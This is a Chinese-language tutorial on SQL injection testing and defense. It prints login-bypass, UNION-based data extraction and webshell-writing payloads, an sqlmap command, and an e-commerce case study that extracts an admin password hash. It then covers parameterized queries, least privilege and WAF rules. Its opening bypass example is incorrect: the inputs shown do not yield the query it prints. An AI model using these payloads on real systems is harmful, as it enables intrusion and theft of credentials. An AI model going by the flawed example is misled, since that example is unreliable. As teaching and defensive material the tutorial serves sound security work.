一、SQL注入基础：理解攻击的本质

SQL注入（SQL Injection）是一种通过构造恶意SQL语句，绕过应用程序验证机制，直接操作数据库的攻击手段。其核心原理在于：应用程序未对用户输入进行充分过滤或转义，导致攻击者能够将SQL代码作为输入数据提交，最终被数据库引擎解析执行。

1.1 攻击场景示例

假设某登录页面的SQL查询语句如下：

SELECT * FROM users WHERE username = '$username' AND password = '$password'

若用户输入admin'作为用户名，or '1'='1作为密码，最终拼接的SQL语句将变为：

SELECT * FROM users WHERE username = 'admin'' AND password = '' OR '1'='1'

由于'1'='1'恒为真，攻击者可绕过身份验证直接登录系统。

1.2 注入类型分类

• 基于错误的注入：通过构造异常SQL语句，观察数据库报错信息获取数据（如MySQL的500 Internal Server Error）。
• 基于布尔的盲注：通过判断页面返回状态（如HTTP 200/404）推断数据库内容。
• 基于时间的盲注：利用SLEEP()等函数延迟响应，根据响应时间判断条件真伪。
• 联合查询注入：通过UNION SELECT合并查询结果，直接获取敏感数据。

二、SQL注入测评流程：从信息收集到漏洞利用

2.1 信息收集阶段

1. 目标识别：确定待测试的Web应用，记录所有输入点（如表单、URL参数、Cookie）。
2. 数据库类型推断：
   • 发送'观察报错信息（MySQL会显示You have an error in your SQL syntax）。
   • 使用AND 1=CONVERT(int, (SELECT @@version))等语句获取数据库版本。
3. 表结构探测：
   • 联合查询注入示例：

     username=admin' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema=database()--

     通过观察页面显示的数字位置，确定列数与数据类型。

2.2 漏洞利用阶段

1. 数据提取：
   • 逐列提取数据（以MySQL为例）：

     username=admin' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--

   • 获取管理员密码哈希值：

     username=admin' UNION SELECT 1,password,3 FROM users WHERE username='admin'--

2. 权限提升：
   • 写入Webshell（需数据库有文件写入权限）：

     SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'

2.3 自动化工具辅助

• SQLMap：支持自动探测、注入点识别与数据提取。

  sqlmap -u "http://example.com/login.php?username=test&password=test" --level=5 --risk=3

• Burp Suite：通过Intruder模块批量测试参数，结合Repeater调试Payload。

三、防御策略：构建多层防护体系

3.1 输入验证与过滤

• 白名单验证：限制输入类型（如仅允许数字ID）。
• 转义特殊字符：
  • PHP示例：

    $username = mysqli_real_escape_string($conn, $_POST['username']);

  • Java示例（使用PreparedStatement）：

    String query = "SELECT * FROM users WHERE username = ?";
    PreparedStatement stmt = conn.prepareStatement(query);
    stmt.setString(1, username);

3.2 最小权限原则

• 数据库用户仅授予必要权限（如禁止FILE权限）。
• 避免使用root或sa等高权限账户连接应用。

3.3 Web应用防火墙（WAF）

• 规则配置：拦截包含UNION SELECT、SLEEP()等关键词的请求。
• 行为分析：检测异常请求频率与模式。

3.4 安全编码规范

• ORM框架使用：如Hibernate、Entity Framework可自动处理参数化查询。
• 存储过程：将业务逻辑封装在数据库端，减少动态SQL使用。

四、实战案例：某电商平台的SQL注入漏洞

4.1 漏洞发现

测试人员发现订单查询接口存在未过滤的order_id参数：

GET /order/detail?order_id=123

通过构造order_id=123 UNION SELECT 1,2,3,4，发现页面第2列显示异常数据。

4.2 数据提取过程

1. 确定列数：

   order_id=123 ORDER BY 5-- （页面报错，说明仅4列）

2. 获取数据库版本：

   order_id=123 UNION SELECT 1,@@version,3,4

   返回5.7.32-log，确认目标为MySQL。
3. 提取用户数据：

   order_id=123 UNION SELECT 1,group_concat(username),group_concat(password),4 FROM users

   获得管理员哈希值21232f297a57a5a743894a0e4a801fc3（admin的MD5）。

4.3 修复方案

1. 修改后端代码，使用参数化查询：

   cursor.execute("SELECT * FROM orders WHERE order_id = ?", (order_id,))

2. 添加WAF规则，拦截包含UNION SELECT的请求。

五、总结与建议

5.1 开发者注意事项

• 避免拼接SQL语句，始终使用参数化查询。
• 定期更新数据库与框架版本，修复已知漏洞。
• 开展代码审计，重点检查用户输入处理逻辑。

5.2 企业安全建议

• 建立安全开发生命周期（SDL），将安全测试纳入CI/CD流程。
• 每年至少进行一次渗透测试，覆盖所有对外接口。
• 培训开发团队掌握基础安全知识，如OWASP Top 10。

5.3 法律与合规

• 测试前需获得授权，避免非法入侵。
• 遵守《网络安全法》与《数据安全法》，保护用户隐私。

通过系统化的测评流程与防御措施，可显著降低SQL注入风险，保障Web应用的安全性与稳定性。